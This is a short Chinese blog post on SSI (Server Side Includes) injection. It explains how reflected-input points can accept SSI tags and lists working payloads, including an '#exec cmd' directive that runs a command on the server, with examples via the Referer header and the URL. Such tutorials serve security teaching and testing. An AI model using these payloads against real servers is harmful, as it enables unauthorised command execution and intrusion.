ssi注入

作者: cws | 来源:发表于2017-06-27 13:24 被阅读139次

原文链接:http://wyb0.com/posts/ssi-injection/

0x00 SSI

SSI (Server Side Includes)是HTML页面中的指令,在页面被提供时由服务器进行运算,以对现有HTML页面增加动态生成的内容,而无须通过CGI程序提供其整个页面,或者使用其他动态技术。

在很多场景中,用户输入的内容可以显示在页面中,一个存在反射XSS漏洞的页面,如果输入的payload不是xss代码而是ssi的标签,服务器又开启了ssi支持的话就会存在SSI漏洞

若注入点在url中则可能需要进行url编码

0x01 payload

"-->'-->`--><!--#set var="a" value="123"--><!--#set var="b" value="654"--><!--#echo var="a"--><!--#echo var="b"-->

<!--#echo var="DATE_LOCAL" -->

<!--#exec cmd="dir" -->

0x02 示例

  • Referer被输出到了页面中


    图片.png
  • url中的数据被输出到页面中(有时候url中的payload需要url编码)


    图片.png

相关文章

  • ssi注入

    原文链接:http://wyb0.com/posts/ssi-injection/ 0x00 SSI SSI (S...

  • SSI服务器注入

    什么是SSI 全程:server side includes injection 服务器端包含注入 SSI是英文S...

  • php 集成环境http_config html语法配置支持in

    1:加载ssi模块。因为ssi是apache中的一个模块服务项,要使用ssi功能,我们首先要对ssi模块进行加载,...

  • ssi技术

    SSI直译服务器端包含(Server Side Includes),由字面上看由WEB在服务器提供的一种功能,并且...

  • SSI上手

    目的:SpringMVC Spring Mybatis项目上手方法:写个小项目要严格按照java项目结构开发 推荐...

  • 一些术语

    SSI:SSI 是 Server Side Include 的首字母缩略词。包含有嵌入式服务器方包含命令的 HTM...

  • 去中心化身份系统未来市场

    What if SSI evolved into more freedom for Content creator...

  • pywifi的wifi密码破解器

    import timeimport pywififrom pywifi import const wifi_ssi...

  • hackthissite

    level8:Hack This Site! 用到了: SSI(Server Side Includeds)使用详...

  • java ssi 中文乱码

    中文乱码, 基本就分两段, 一, 从request获取到的就是乱码, 二, request获取的没问题, 存储到数...

网友评论

    本文标题:ssi注入

    本文链接:https://www.haomeiwen.com/subject/wccecxtx.html